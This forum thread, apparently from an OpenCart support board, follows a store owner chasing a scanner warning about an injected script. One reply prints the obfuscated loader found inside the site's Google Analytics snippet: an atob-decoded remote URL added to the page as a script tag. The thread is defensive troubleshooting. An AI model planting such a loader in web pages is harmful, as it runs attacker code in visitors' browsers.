We run an online store, here: https://tinyurl.com/yxv2z9p4
Whenever I've done malware scans or error checking it generally passes without issue, but occasionally I see mention of a possible injection attack. And it's always this same js file: https://www.jctfinancial.com/wp-content ... plugins.js
See the below scan results for confirmation:
https://rescan.pro/result.php?5c246c4ba ... dc0e071ed3
I've tried browsing the site in Firefox using debug mode and it too shows a warning against this. However, I can't find which of the files on my site contains any links to this. I've done a search on the contents of a full backup of the site and can't find any files containing that URL and I can't see how in Firefox it's possible to determine where that link is coming from.
If anyone can shed any light I'd be very grateful.
Opencart 2.3.0.2. Journal 2 template.
Whenever I've done malware scans or error checking it generally passes without issue, but occasionally I see mention of a possible injection attack. And it's always this same js file: https://www.jctfinancial.com/wp-content ... plugins.js
See the below scan results for confirmation:
https://rescan.pro/result.php?5c246c4ba ... dc0e071ed3
I've tried browsing the site in Firefox using debug mode and it too shows a warning against this. However, I can't find which of the files on my site contains any links to this. I've done a search on the contents of a full backup of the site and can't find any files containing that URL and I can't see how in Firefox it's possible to determine where that link is coming from.
If anyone can shed any light I'd be very grateful.
Opencart 2.3.0.2. Journal 2 template.
Well, this topic seems to have been cleared out already, but that's, what it takes
for Journal, to make an OpenCart Software work.
---
But you also seem to use Wordpress on the same Site, and that makes it even more
dangerous. But I also recall an insecure Journal-2 Edition to be mentioned a while
ago, so, better get a professional, because nobody else would be able or willing, to
assist in such an installation.
Good Luck ...
Ernie
for Journal, to make an OpenCart Software work.
---
But you also seem to use Wordpress on the same Site, and that makes it even more
dangerous. But I also recall an insecure Journal-2 Edition to be mentioned a while
ago, so, better get a professional, because nobody else would be able or willing, to
assist in such an installation.
Good Luck ...
Ernie
My Github OC Site: https://github.com/IP-CAM
5'200 + FREE OC Extensions, on the World's largest private Github OC Repository Archive Site.
Well, I just wanted to point out, why so many don't like Journal Themes,
since that kind of Coding is far from the 'regular' way of 'handling' OC.
Still, your problem is not directly related to OC, it's a Wordpress Hack, as it
looks, doing bad things to your Site.
Ernie
since that kind of Coding is far from the 'regular' way of 'handling' OC.
Still, your problem is not directly related to OC, it's a Wordpress Hack, as it
looks, doing bad things to your Site.
Ernie
My Github OC Site: https://github.com/IP-CAM
5'200 + FREE OC Extensions, on the World's largest private Github OC Repository Archive Site.
It's these two lines of code. It's decoding the URL and then adding the script to the page.
It appears in you Google Analytics code.
You need to remove the code and fix your Google Analytics code. I would also recommend you check if your theme has and updates that may have security patches. Also change all your passwords, such as all OpenCart admin logins, all hosting control panel logins, all FTP account, etc.
Code: Select all
var api_service = atob('aHR0cHM6Ly93d3cuamN0ZmluYW5jaWFsLmNvbS93cC1jb250ZW50L3BsdWdpbnMvcGx1Z2lucy5qcw==');
var api = document.createElement('script');api.src = api_service;document.head.appendChild(api);
Code: Select all
<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-34406391-6"></script>
<script>
window.dataLayer = window.dataLayer || [];
function gtag(){dataLayer.push(arguments);}
var api_service = atob('aHR0cHM6Ly93d3cuamN0ZmluYW5jaWFsLmNvbS93cC1jb250ZW50L3BsdWdpbnMvcGx1Z2lucy5qcw==');
var api = document.createElement('script');api.src = api_service;document.head.appendChild(api);
gtag('js', new Date());
gtag('config', 'UA-34406391-6');
</script>
Even though you're not running a Wordpress site, this implies that there are still WP files uploded to the server. Is that the case? Hackers don't care whether or not you're actually running a WP site. They just want to find files and hack them so the malicious code gets executed and spread around.
ELEV8TE Website Development
Available for hire - please send email to hello@elev8your.com
https://www.elev8your.com
That's correct ! And hacking Attempts on OC Sites are not uncommon, I frequentlyHackers don't care whether or not you're actually running a WP site.
redirect such Calls, by use of a fine 1.5.x Extension, as you can see on the image below.
Ernie
---
My Github OC Site: https://github.com/IP-CAM
5'200 + FREE OC Extensions, on the World's largest private Github OC Repository Archive Site.
Who is online
Users browsing this forum: No registered users and 53 guests